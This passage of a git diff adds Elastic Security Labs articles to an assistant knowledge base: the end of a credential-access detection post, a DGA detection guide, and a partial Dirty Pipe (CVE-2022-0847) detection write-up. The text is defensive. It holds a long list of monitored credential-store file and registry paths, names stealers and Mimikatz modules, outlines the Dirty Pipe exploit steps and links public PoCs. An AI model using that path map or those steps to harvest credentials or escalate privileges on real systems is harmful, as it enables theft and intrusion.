+![EQL query correlating relevant fields](/assets/images/detect-credential-access/eql-correlation.jpg)
+
+## Behavior Protection
+
+In addition to being able to use those events in [detection rules](https://github.com/elastic/detection-rules), Elastic Endpoint Security includes built-in malicious behavior protection rules that can automatically react to high-confidence, highly-suspicious sensitive file/registry accesses.
+
+For example, here we can see Elastic Endpoint’s behavior protection rules catching:
+
+- [LSASecretsdumper](https://github.com/gtworek/PSBits/tree/master/LSASecretDumper) - LSA secrets stealing with LsaOpenSecret and LsaQuerySecret APIs.
+- [Mimikatz (lsadump:sam and secrets modules)](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets) - modules to dump creds from the SAM and LSA registry keys.
+- Lazagne (DPAPI MasterKeys access) - stealing MasterKey to decrypt DPAPI protected resources.
+
+![Elastic Endpoint Security preventing credential theft attempts](/assets/images/detect-credential-access/EES.jpg)
+
+Here are detections of Chrome Login Data file access by different infostealers ([Poulight Stealer](https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer), [AgentTesla](https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla)) including [lolbins](https://lolbas-project.github.io/) (powershell script):
+
+![Elastic Endpoint Security preventing information stealing](/assets/images/detect-credential-access/EES-preventing.jpg)
+
+Below are some example detections for Windows Credential Manager Store access by common stealers AgentTesla and [FormBook](https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook):
+
+![Elastic Endpoint Security preventing Windows Credential Manager Store theft](/assets/images/detect-credential-access/EES-windows-credential.jpg)
+
+## Monitored File and Registry Paths
+
+The current list of monitored file and registry paths is listed below. Due to data volume and performance concerns, the Elastic Endpoint generates only one event per process.entity_id for a given file or registry pattern in the list. From a detection point of view this won’t create any visibility gap since we emit an event on the first file or registry access performed by any process.
+
+**Monitored registry paths**
+
+```
+registry_paths:
+  # SAM - Encrypted Local Account Pwd hashes
+  - '\REGISTRY\MACHINE\SAM'
+  - '\REGISTRY\MACHINE\SAM\SAM\Domains\*'
+
+  # SYSTEM - Bootkey/Syskey GBG, JD, Skew1
+  - '\REGISTRY\MACHINE\SYSTEM\ControlSet00?\Control\Lsa\JD'
+  - '\REGISTRY\MACHINE\SYSTEM\ControlSet00?\Control\Lsa\Skew1'
+  - '\REGISTRY\MACHINE\SYSTEM\ControlSet00?\Control\Lsa\GBG'
+  # SECURITY - LSA key, encrypted domain cached pwd and machine account pwd
+  - '\REGISTRY\MACHINE\SECURITY\CACHE*'
+  - '\REGISTRY\MACHINE\SECURITY\POLICY\SECRETS\*'
+
+  # Registry - Putty SSH Keys
+  - '\Registry\Machine\Software\SimonTatham\PuTTY\SshHostKeys\*'
+  - '\Registry\User\*\Software\SimonTatham\PuTTY\SshHostKeys\*'
+
+  # Sysadmin - WinSCP
+  - '\REGISTRY\User\*\software\Martin Prikryl\WinSCP 2\Sessions\*\Password*'
+
+  # Sysadmin - TeamViewer
+  - '\REGISTRY\Machine\SOFTWARE\WOW6432Node\TeamViewer\PrxyPassword*'
+
+  # Sysadmin - OpenVPN
+  - '\REGISTRY\User\*\Software\OpenVPN-GUI\Configs\auth-data*'
+
+  # Outlook Passwords
+  - '\Registry\User\*\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\*Password'
+  - '\Registry\Users\*\Software\Microsoft\Office\*.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676'
+
+```
+
+**Monitored registry paths**
+
+```
+file_paths:
+  # DPAPI - User MasterKey
+  # DPAPI - CREDHIST
+  - 'C:\Users\*\AppData\Roaming\Microsoft\Protect\*'
+
+  # DPAPI - System MasterKey
+  - '?:\Windows\System32\Microsoft\Protect\S-1-5-18\User\*'
+
+  # CredVault - User
+  - '?:\Users\*\AppData\Roaming\Microsoft\Vault\*'
+  - '?:\Users\*\AppData\Local\Microsoft\Vault\*'
+
+  # CredVault - System
+  - '?:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault\*'
+
+  # CredMan - Users
+  - '?:\Users\*\AppData\Roaming\Microsoft\Credentials\*'
+  - '?:\Users\*\AppData\Local\Microsoft\Credentials\*'
+
+  # CredMan - System
+  - '?:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\*'
+  - '?:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Credentials\*'
+
+  # CredMan - Service
+  - '?:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials\*'
+  - '?:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Credentials\*'
+  - '?:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Credentials\*'
+  - '?:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Credentials\*'
+
+  # Unattended creds
+  - '?:\Windows\Panther\Unattend.xml'
+  - '?:\Windows\Panther\Unattended.xml'
+  - '?:\Windows\Panther\Unattend\Unattended.xml'
+  - '?:\Windows\Panther\Unattend\Unattend.xml'
+  - '?:\Windows\System32\Sysprep\unattend.xml'
+  - '?:\Windows\System32\Sysprep\Panther\unattend.xml'
+
+  # Browser
+  - '*\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*\key*.db'
+  - '*\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*\logins.json'
+  - '*\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*\cert*.db'
+  - '*\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*\cookies.sqlite'
+  - '*\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*\signons.sqlite'
+  - '*\Users\*\User Data\Default\Login Data'
+  - '*\users\*\AppData\Local\*\User Data\Default\Cookies'
+  - '*\Users\*\AppData\Roaming\Opera Software\Opera Stable\*'
+
+  # RDP
+  - '*\Users\*\AppData\Local\Microsoft Corporation\Remote Desktop Connection Manager\RDCMan.settings'
+  - '*\Users\*\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings'
+
+  # Database - SVN
+  - '?:\Users\*\AppData\Roaming\Subversion\auth\svn.simple'
+
+  # Database - postgresql
+  - '?:\Users\*\AppData\Roaming\postgresql\pgpass.conf'
+
+  # Database - robomongo
+  - '?:\Users\*\.3T\robo-3t\*\robo3t.json'
+  - '?:\users\*\.3T\robomongo\*\robomongo.json'
+  - '?:\users\*\.config\robomongo\*\robomongo.json'
+
+  # Database - squirrel
+  - '?:\Users\*\.squirrel-sql\SQLAliases23.xml'
+
+  # Database - DbVisualizer
+  - '?:\Users\*\.dbvis\config70\dbvis.xml'
+
+  # Database - SQL Developer
+  - '?:\Users\*\AppData\Roaming\SQL Developer\system*\o.jdeveloper.db.connection.*\connections.xml'
+  - '?:\Users\*\AppData\Roaming\SQL Developer\system*\o.sqldeveloper.*\product-preferences.xml'
+
+  # Cloud - AWS
+  - '?:\Users\*\.aws\credentials\*'
+
+  # Cloud - GCloud
+  - '?:\Users\*\AppData\Roaming\gcloud\*'
+
+  # Cloud - Azure
+  - '?:\Users\*\.azure\*'
+
+  # Cloud - Github
+  - '?:\Users\*\.config\git\credentials'
+
+  # Cloud - iCloud
+  - '?:\users\*\AppData\Roaming\Apple Computer\Preferences\*'
+
+  # Private Keys & Certs & Keepass
+  - '*.pem'
+  - '*.pfx'
+  - '*.p12'
+  - '*.pvk'
+  - '*.key'
+  - '*.ppk'
+  - '*.rdg'
+  - '*.kdb'
+  - '*.kdbx'
+
+  # Config - IIS Connection Strings
+  - '?:\inetpub\wwwroot\*\web.config'
+
+  # FileZilla Creds
+  - '?:\Users\*\AppData\Roaming\FileZilla\*'
+
+  # Jenkins Creds
+  - '*\credentials.xml'
+  - '*\secrets\master.key'
+  - '*\secrets\hudson.util.Secret'
+
+  # SSH and SSL
+  - '?:\users\*\.ssh\*'
+
+  # WIFI
+  - '?:\\ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces\\*\\*.xml'
+
+  # Collab
+  - '?:\Users\*\AppData\Roaming\Slack\Cookies\*'
+  - '?:\Users\*\AppData\Roaming\Slack\storage\slack-downloads\*'
+
+  # GPP - 'Creds (legacy domains)
+
+  - '?:\ProgramData\Microsoft\Group Policy\History\*\MACHINE\Preferences\Groups\Groups.xml'
+  - '?:\ProgramData\Microsoft\Group Policy\History\*\MACHINE\Preferences\DataSources.xml'
+  - '?:\ProgramData\Microsoft\Group Policy\History\*\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml'
+  - '?:\ProgramData\Microsoft\Group Policy\History\*\MACHINE\Preferences\Services\Services.xml'
+  - '?:\ProgramData\Microsoft\Group Policy\History\*\MACHINE\Preferences\Registry\registry.xml'
+  - '?:\Users\*\AppData\Roaming\KeePass\KeePass*'
+
+  # Thunderbird
+  - '?:\Users\*\AppData\Roaming\Thunderbird\Profiles\*.default*\*'
+
+  # VPN
+  - '?:\Users\*\AppData\Local\NordVPN\NordVPN.exe*\user.config'
+
+  # NTDS.DIT
+  - '*\NTDS.DIT'
+
+  # SAM
+  - '*\SAM'
+
+```
+
+## Closing thoughts
+
+Leveraging the new events that are collected with our kernel mode driver, and not subject to user mode tampering, we expanded our detection and prevention coverage for both credential discovery and access. Furthermore, combining it with the correlation features of Elastic EQL, we can create interesting hunts and detection rules for a variety of scenarios, with minimal false positive rates.
+
+## References
+
+- [https://github.com/AlessandroZ/LaZagne](https://github.com/AlessandroZ/LaZagne)
+- [https://github.com/GhostPack/Seatbelt](https://github.com/GhostPack/Seatbelt)
+- [https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107](https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107)
+- [https://github.com/gtworek/PSBits/tree/master/LSASecretDumper](https://github.com/gtworek/PSBits/tree/master/LSASecretDumper)
+- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detect_domain_generation_algorithm_activity_with_new_kibana_integration.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detect_domain_generation_algorithm_activity_with_new_kibana_integration.md
new file mode 100644
index 0000000000000..14aa372bef3ac
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detect_domain_generation_algorithm_activity_with_new_kibana_integration.md
@@ -0,0 +1,115 @@
+---
+title: "Detect domain generation algorithm (DGA) activity with new Kibana integration"
+slug: "detect-domain-generation-algorithm-activity-with-new-kibana-integration"
+date: "2023-05-17"
+description: "We have added a DGA detection package to the Integrations app in Kibana. In a single click, you can install and start using the DGA model and associated assets, including ingest pipeline configurations, anomaly detection jobs, and detection rules."
+author:
+  - slug: melissa-alvarez
+image: "library-branding-elastic-stack-midnight-1680x980-no-logo.jpg"
+category:
+  - slug: machine-learning
+  - slug: detection-science
+---
+
+Searching for a way to help protect your network from potential domain generation algorithm (DGA) attacks? Look no further — a DGA detection package is now available in the Integrations app in Kibana.
+
+In a single click, users can install and start using the DGA model and associated assets, including ingest pipeline configurations, anomaly detection jobs, and detection rules. Read on for step-by-step instructions on installing and fully enabling the DGA package.
+
+[Related article: [Automating the Security Protections rapid response to malware](https://www.elastic.co/blog/automating-security-protections-rapid-response-to-malware)]
+
+# What is a DGA?
+
+A DGA is a technique employed by many malware authors to ensure that infection of a client machine evades defensive measures. The goal of this technique is to hide the communication between an infected client machine and the command and control (C & C or C2) server by using hundreds or thousands of randomly generated domain names, of which one will ultimately resolve to the IP address of a C & C server.
+
+To more easily visualize what’s occurring in a DGA attack, imagine for a moment you’re a soldier on a battlefield. Like many soldiers, you have communication gear that uses radio frequencies for communication. Your enemy may try to disrupt your communications by jamming your radio frequencies. One way to devise a countermeasure for this is by frequency hopping — using a radio system that changes frequencies very quickly during the course of a transmission. To the enemy, the frequency changes appear to be random and unpredictable, so they are hard to jam.
+
+DGAs are like a frequency-hopping communication channel for malware. They change domains so frequently that blocking the malware’s C2 communication channel becomes infeasible by means of DNS domain name blocking. There are simply too many randomly generated DNS names to successfully identify and block them.
+
+This technique emerged in the world of malware with force in 2009, when the “Conficker” worm began using a very large number of randomly generated domain names for communication. The worm’s authors developed this countermeasure after a consortium of security researchers interrupted the worm’s C2 channel by shutting down the DNS domains it was using for communication. DNS mitigation was also performed in the case of the 2017 WannaCry ransomware global outbreak.
+
+# Getting started
+
+We have released the model and the associated assets — including the pipelines, anomaly detection configurations, and detection rules — to the Integrations app in Kibana as of 8.0. We will be maintaining this format moving forward.
+
+If you don’t have an Elastic Cloud cluster but would like to start experimenting with the released ProblemChild package, you can start a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.
+
+We will now look at the steps to get DGA up and running in your environment in a matter of minutes using the released DGA package.
+
+### Step 1: Installing the package assets
+
+In Kibana, the Integrations app now includes the DGA detection package. To install the assets, click the **Install DGA assets** button under the **Settings** tab. This will install all of the artifacts necessary to use the DGA model to generate alerts when DGA activity is detected in your network data.
+
+![](/assets/images/detect-domain-generation-algorithm-activity-with-new-kibana-integration/blog-elastic-DGA-1.png)
+
+![](/assets/images/detect-domain-generation-algorithm-activity-with-new-kibana-integration/blog-elastic-DGA-2.jpg)
+
+Once installation is complete, you can navigate to **Stack Management > Ingest Pipelines** and see that the **`<version-number>-ml\_dga\_ingest\_pipeline`** has been installed and can now be used to enrich incoming ingest data. The ingest pipeline leverages the **`<version-number>-ml\_dga\_inference\_pipeline`** to do this.
+
+![](/assets/images/detect-domain-generation-algorithm-activity-with-new-kibana-integration/blog-elastic-DGA-3.png)
+
+Similarly, the installed DGA model can now be seen in **Machine Learning > Model Management > Trained Models**.
+
+![](/assets/images/detect-domain-generation-algorithm-activity-with-new-kibana-integration/blog-elastic-DGA-4.jpg)
+
+### Step 2: Enriching your data
+
+Now you are ready to ingest your data using the ingest pipeline. The supervised model will analyze and enrich incoming data containing DNS events with a DGA score.
+
+This pipeline is designed to work with data containing DNS events — such as [packetbeat](https://www.elastic.co/beats/packetbeat) data — which contain these ECS fields: dns.question.name and dns.question.registered_domain. You can add the installed ingest pipeline to an Elastic beat by adding a simple [configuration setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats).
+
+If you already have an ingest pipeline associated with your indices, you can use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html) to integrate the DGA ingest pipeline into your existing pipeline.
+
+You will also want to add the following mappings to the beat you chose:
+
+```
+{
+  "properties": {
+    "ml_is_dga": {
+      "properties": {
+        "malicious_prediction": {
+          "type": "long"
+        },
+        "malicious_probability": {
+          "type": "float"
+        }
+      }
+    }
+  }
+}
+```
+
+You can do this under **Stack Management > Index Management > Component Templates.** Templates that can be edited to add custom components will be marked with a _@custom_ suffix. Edit the _@custom_ component template for your Elastic beat by pasting the above JSON blob in the **Load JSON** flyout.
+
+![](/assets/images/detect-domain-generation-algorithm-activity-with-new-kibana-integration/Screen_Shot_2022-07-29_at_8.37.43_AM.jpeg)
+
+![](/assets/images/detect-domain-generation-algorithm-activity-with-new-kibana-integration/Screen_Shot_2022-07-29_at_8.38.11_AM.jpeg)
+
+You should now see that the model enriches incoming DNS events with the following fields:
+
+- **Ml_is_dga.malicious_prediction:** A value of “1” indicates the DNS domain is predicted to be the result of malicious DGA activity. A value of “0” indicates it is predicted to be benign.
+
+- **Ml_is_dga.malicious_probability:** A probability score, between 0 and 1, that the DNS domain is the result of malicious DGA activity.
+
+If you want an immediate way to test that the ingest pipeline is working as expected with your data, you can use a few sample documents with the [simulate pipeline API](https://www.elastic.co/guide/en/elasticsearch/reference/current/simulate-pipeline-api.html) and confirm you see the **ml_is_dga** fields.
+
+### Step 3: Running anomaly detection
+
+The package includes a pre-configured anomaly detection job. This machine learning (ML) job examines the DGA scores produced by the supervised DGA model and looks for anomalous patterns of unusually high scores for a particular source IP address. These events are assigned an anomaly score.
+
+To run this job on your enriched data, go to **Machine Learning > Anomaly Detection**. When you create a job using the job wizard, you should see an option to Use preconfigured jobswith a card for DGA. After selecting the card, you will see the pre-configured anomaly detection job that can be run. Note this job is only useful for indices that have been enriched by the ingest pipeline.
+
+### Step 4: Enabling the rules
+
+To maximize the benefit of the DGA framework, activate the installed detection rules. They are triggered when certain conditions for the supervised model or anomaly detection job are satisfied. The complete list of the installed rules can be found in the **Overview** page of the package itself or in the latest experimental detections [release](https://github.com/elastic/detection-rules/releases/tag/ML-experimental-detections-20211130-7).
+
+To fully leverage the included preconfigured anomaly detection job, enable the complementary rule: _Potential DGA Activity._ This will create an anomaly-based alert in the detection page in the security app.
+
+The preconfigured anomaly detection job and complementary rule are both available in the detection rules repo [releases](https://github.com/elastic/detection-rules/releases). To enable and use the installed rules, navigate to **Security > Rules** and select _Load Elastic prebuild rules and timeline templates_.
+
+![](/assets/images/detect-domain-generation-algorithm-activity-with-new-kibana-integration/blog-elastic-DGA-5.jpg)
+
+# Get in touch
+
+We’d love for you to try out ProblemChild and give us feedback as we work on adding new capabilities to it. If you run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack), [discussion forums](https://discuss.elastic.co/c/security), or even our [open detections repository](https://github.com/elastic/detection-rules).
+
+You can always experience the latest version of [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud and follow along with this blog to set up the ProblemChild framework in your environment for your Windows process event data. And take advantage of our [Quick Start training](https://www.elastic.co/training/elastic-security-quick-start) to set yourself up for success. Start your [free trial of Elastic Cloud](https://cloud.elastic.co/registration) today to get access to the platform. Happy experimenting!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_and_responding_to_dirty_pipe_with_elastic.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_and_responding_to_dirty_pipe_with_elastic.md
new file mode 100644
index 0000000000000..8715349a82f1a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/detecting_and_responding_to_dirty_pipe_with_elastic.md
@@ -0,0 +1,274 @@
+---
+title: "Detecting and responding to Dirty Pipe with Elastic"
+slug: "detecting-and-responding-to-dirty-pipe-with-elastic"
+date: "2022-09-09"
+description: "Elastic Security is releasing detection logic for the Dirty Pipe exploit."
+author:
+  - slug: colson-wilhoit
+  - slug: samir-bousseaden
+  - slug: jake-king
+  - slug: andrew-pease
+image: "photo-edited-01@2x.jpg"
+category:
+  - slug: security-research
+---
+
+## Preamble
+
+Dirty Pipe is a local privilege escalation vulnerability that is easily exploitable with a handful of working exploit POCs already available. Its broad scope (any user-readable file and affected Linux versions) along with its evolving nature (the SUID shell backdoor exploit) make CVE-2022-0847 especially dangerous for administrators of systems that are potentially vulnerable.
+
+### What is Dirty Pipe (CVE-2022-0847)?
+
+[CVE-2022-0847](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847) is a Linux local privilege escalation vulnerability, discovered by security researcher Max Kellermann that takes advantage of the way the Linux kernel manages page files and named pipes allowing for the overwriting of data in read-only files. This vulnerability impacts Linux kernels 5.8 and later until any version before 5.16.11, 5.15.25, and 5.10.102.
+
+### What is the impact?
+
+With many POC’s already released, this vulnerability can be easily exploited to gain root-level privileges by, for instance, rewriting sensitive files like “/etc/passwd” or hijacking a SUID root binary (like sudo) via injection of malicious code.
+
+### What is Elastic doing about it?
+
+Elastic is releasing detection logic and Auditd rules that can be used to detect exploitation of this vulnerability.
+
+## Dirty Pipe Details
+
+The vulnerability can be exploited due to a flaw in the new pipe buffer structure where a flag member lacked proper initialization and could then contain a stale value. This could then be used to write to pages within the page cache behind read-only files, allowing for privilege escalation. Given the specific nature of this vulnerability, detection can be quite difficult.
+
+### Linux Pipes & CVE-2022-0847
+
+[Pipes](https://man7.org/linux/man-pages/man2/pipe.2.html) are an interprocess communication mechanism represented as a file within Linux that can receive input data and provide an output for that data. The output of one process can become the input of another using a “pipe” to forward that data between.
+
+Pipes are managed by the CPU in memory and their data is referred to as a “page”.
+
+The exploitation of this vulnerability utilizes a process called “page splicing”. Page splicing is used to merge data between different pipe pages in memory without having to rewrite the data.
+
+The flag we referenced in the summary is the PIPE_BUF_FLAG_CAN_MERGE flag. This must be set in order for a page cache to be merged and is only set when the pipe page becomes full. Howerver, if the page cache is emptied completely this flag remains (lack of initialization) which is where the problem lies.
+
+The exploit functions generally by:
+
+1. Opening a new pipe
+2. Filling the pipe’s page cache with arbitrary data in order to set the PIPE_BUF_FLAG_CAN_MERGE flag
+3. Draining the page cache of data but retaining the PIPE_BUF_FLAG_CAN_MERGE flag and replacing the data with the new data they want to overwrite a read-only file with
+4. The splice (“page splicing”) [syscall](https://man7.org/linux/man-pages/man2/syscalls.2.html) is then used to merge the pages (the pipe page and target file page) leading to the new data being added to a target file bypassing the read-only permissions
+
+Many of the exploit POCs observed so far target the /etc/passwd file to overwrite and provide the users with elevated root privileges. Other variants of the exploit released allow for the creation of a SUID shell backdoor by overwriting a binary that has SUID permissions (superuser capabilities) giving the user a root shell and complete control.
+
+We anticipate that adversaries and researchers will develop a multitude of other exploitation chains with this particular vulnerability.
+
+### Proof Of Concept Code
+
+The security community has developed a multitude of different tests that adversaries may take advantage of in future attacks against systems. POCs listed below are authored to help security researchers identify if systems are impacted by the vulnerability, and furthermore - test detection strategies.
+
+- Original Max Kellermann write-up: [https://dirtypipe.cm4all.com/](https://dirtypipe.cm4all.com/)
+- SUID shell: ​​[https://haxx.in/files/dirtypipez.c](https://haxx.in/files/dirtypipez.c)
+- Passwd overwrite: [https://github.com/liamg/traitor](https://github.com/liamg/traitor)
+- Passwd overwrite: ​​[https://github.com/imfiver/CVE-2022-0847](https://github.com/imfiver/CVE-2022-0847)
+- Metasploit module: [https://github.com/rapid7/metasploit-framework/pull/16303](https://github.com/rapid7/metasploit-framework/pull/16303)
+
+## Finding systems vulnerable to Dirty Pipe
+
+Beyond using a traditional vulnerabilty scanner, there are several ways to detect systems vulnerable to Dirty Pipe.
+
+### Using the Elastic Security Integration
+
+If you have Auditbeat, Filebeat (with the Auditd module enabled), or the Elastic Agent (with the Security or Auditd integrations deployed) you can use the Lens visualization tool (located in Kibana) to quickly compile and save a list of vulnerable systems as evidenced in the screenshot below:
+
+![Analyzing your infrastructure for kernel versions impacted by Dirty Pipe](/assets/images/detecting-and-responding-to-dirty-pipe-with-elastic/dirty-pipe-with-elastic-image7.png)
+
+### Using the Osquery Manager Integration
+
+Additionally, you can use the [Osquery Manager integration](https://docs.elastic.co/en/integrations/osquery_manager) to collect the kernel information from all endpoints. To do this, you need to add the Osquery Manager integration to an Elastic Agent policy (Integrations → Osquery Manager → Add Osquery Manager). Once you’ve added the integration, you can perform a simple query: SELECT version FROM kernel_info; which will return the hostname and Linux kernel version from all endpoints with the policy.
+
+![Using Osquery Manager to collect kernel versions](/assets/images/detecting-and-responding-to-dirty-pipe-with-elastic/dirty-pipe-with-elastic-image3.jpg)
+
+## Detecting CVE-2022-0847 exploitation using Auditd
+
+[Auditd](https://linux.die.net/man/8/auditd) is the userspace component of the Linux Auditing System. Auditd stands for Audit Daemon and is a background running service responsible for collecting and writing log files to disk. The Linux Audit System includes a kernel component that hooks system calls and communicates those to Auditd. Auditd is capable of logging System Calls, File Access, and certain pre-configured Audit events. You can install and enable Auditd for free with the package manager on your Linux distribution of choice.
+
+### Auditd rules
+
+Auditd rules define what is to be captured and logged. These rules are generally defined in an audit.rules file and placed at /etc/audit/audit.rules or /etc/audit/rules.d/audit.rules. Events are written to /var/log/audit/audit.log on the local system.
+
+Once you have installed and enabled Auditd, you can add the below lines to your audit.rules file to detect Dirty Pipe exploitation attempts.
+
+```
+Dirty Pipe Auditd rules
+
+-a always,exit -F arch=b64 -S splice -F a0=0x3 -F a2=0x5 -F a3=0x0 -F key=dirtypipe
+-a always,exit -F arch=b64 -S splice -F a0=0x6 -F a2=0x8 -F a3=0x0 -F key=dirtypipe
+-a always,exit -F arch=b64 -S splice -F a0=0x7 -F a2=0x9 -F a3=0x0 -F key=dirtypipe
+```
+
+> The aforementioned rules were adapted by Elastic Security from initial findings by [Jonas LeJon](https://twitter.com/jonasl/status/1501840914381258756).
+
+## Linux Auditing System event collection with Elastic
+
+There are a few different ways to collect Linux Auditing System events using Elastic. You can either use the Elastic Agent with the Auditd integration, Auditbeat, or the Auditd module for Filebeat.
+
+> Remember, if you’re using the Auditd integrations for the Elastic Agent or Filebeat, you’ll need to create the [Auditd rules described above](https://www.elastic.co/security-labs/detecting-and-responding-to-dirty-pipe-with-elastic#auditd-rules).
+
+### The Elastic Agent w/Auditd Integration
+
+The Elastic Agent with the [Auditd Integration](https://docs.elastic.co/en/integrations/auditd) allows for the collection of Auditd rules. To collect these events, you need to add the Auditd integration to an Elastic Agent policy (Integrations → Auditd → Add Auditd).
+
+![Elastic Agent Auditd integration](/assets/images/detecting-and-responding-to-dirty-pipe-with-elastic/dirty-pipe-with-elastic-image6.png)
+
+Once this integration is installed to an Elastic Agent policy and deployed to endpoints, you will see Auditd events populated in Kibana.
+
+You can verify that you are receiving Auditd events in Kibana by using the Kibana query event.dataset : "auditd.log".
+
+### Auditbeat
+
+You can use the [Auditbeat Auditd module](https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-auditd.html) to collect the Linux Audit Framework logs. To do this, [install Auditbeat](https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-installation-configuration.html). You might encounter errors if another process besides Auditbeat, such as Auditd, is registered to receive data from the Linux Audit Framework. To prevent this conflict, you can stop and disable Auditd from running.
+
+```
+Stopping and disabling Auditd
+
+sudo service auditd.service stop
+sudo chkconfig auditd.service off
+```
+
+Edit the /etc/auditbeat/auditbeat.yml file to point to your local, remote, or cloud cluster and add the Dirty Pipe rules provided above in the Auditd rules section.
+
+```
+Adding Dirty Pipe detection rules to the Auditbeat configuration file
+
+# ===== Modules configuration =====
+
+auditbeat.modules:
+
+* module: auditd
+
+# Load audit rules from separate files. Same format as audit.rules(7)
+
+  audit_rule_files: [ '${path.config}/audit.rules.d/*.conf' ]
+  audit_rules: |
+
+## Define audit rules here
+
+## Create file watches (-w) or syscall audits (-a or -A). Uncomment these
+
+## examples or add your own rules
+
+    -a always,exit -F arch=b64 -S splice -F a0=0x3 -F a2=0x5 -F a3=0x0 -F key=dirtypipe
+    -a always,exit -F arch=b64 -S splice -F a0=0x6 -F a2=0x8 -F a3=0x0 -F key=dirtypipe
+    -a always,exit -F arch=b64 -S splice -F a0=0x7 -F a2=0x9 -F a3=0x0 -F key=dirtypipe
+
+…truncated…
+```
+
+Check the configuration and connectivity of Auditbeat using the test commands.
+
+```
+Testing the Auditbeat configuration and output settings
+
+sudo auditbeat test config
+sudo auditbeat test output
+```
+
+Run the Auditbeat setup command using sudo auditbeat setup.
+
+Start Auditbeat using sudo systemctl start auditbeat.service.
+
+Now you should be able to verify events are being populated in the auditbeat-\* Data View within Kibana.
+
+![Auditbeat Data View in Kibana](/assets/images/detecting-and-responding-to-dirty-pipe-with-elastic/dirty-pipe-with-elastic-image4.jpg)
+
+### Filebeat
+
+You can use the [Auditd module for Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-auditd.html) to collect the Auditd logs as well. To do this, [install Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation-configuration.html) and then enable the Auditd module
+
+sudo filebeat modules enable auditd
+
+Next, go into the Auditd configuration file and enable log collection, test, setup, and then start Filebeat.
+
+```
+Enabling Auditd log in the Filebeat configuration file
+
+sudo vi /etc/filebeat/modules.d/auditd.yml
+
+# Module: auditd
+
+# Docs: <https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-auditd.html>
+
+* module: auditd
+  log:
+    enabled: true
+
+# Set custom paths for the log files. If left empty
+
+# Filebeat will choose the paths depending on your OS
+
+    #var.paths:
+
+```
+
+```
+Testing the Filebeat configuration and output settings
+
+sudo filebeat test config
+sudo filebeat test output
+```
+
+Run the Filebeat setup command using sudo filebeat setup.
+
+Start Filebeat using sudo systemctl start filebeat.service.
+
+## Detecting Dirty Pipe with Elastic
+
+Now that Linux Audit Framework events are being populated by either the Elastic Agent, Auditbeat, or Filebeat, you can run queries to detect exploitation attempts using the Kibana Query Language (KQL) in Discover or the Endpoint Query Language (EQL) in Kibana’s Security → Timelines → New Timeline → Correlation query editor.
+
+### Hunt queries in Kibana
+
+KQL query compatible with using the Elastic Agent, Auditbeat, or Filebeat:
+
+```
+KQL query to detect Dirty Pipe exploitation attempts
+
+auditd.log.key : dirtypipe and process.name : *
+
+```
+
+EQL query compatible with using the Auditbeat:
+
+```
+EQL query to detect Dirty Pipe exploitation attempts
+
+process where tags : "dirtypipe" and not process.name : ""
+```
+
+### Detection Engine alerts
+
+You can also create a Detection Engine alert to monitor for exploitation attempts.
+
+![Dirty Pipe Detection Rule](/assets/images/detecting-and-responding-to-dirty-pipe-with-elastic/dirty-pipe-with-elastic-image2.jpg)
+
+Exploitation attempts will be recorded in the Kibana Security Solution in the Alerts section.
+
+![A preview of alerts created pertaining to the log keys created by Auditd](/assets/images/detecting-and-responding-to-dirty-pipe-with-elastic/dirty-pipe-with-elastic-image5.png)
+
+## Respond to Observed Threats
+
+Elastic makes it easy to quickly respond to a threat by isolating the host while still allowing it to communicate with your stack in order to continue monitoring actions taken and/or remediate the threat.
+
+![In-platform capabilities of Elastic Security demonstrating response capabilities](/assets/images/detecting-and-responding-to-dirty-pipe-with-elastic/dirty-pipe-with-elastic-image1.png)
+
+## Defense in Depth Recommendations
+
+The following steps can be leveraged to improve a network’s protective posture:
+
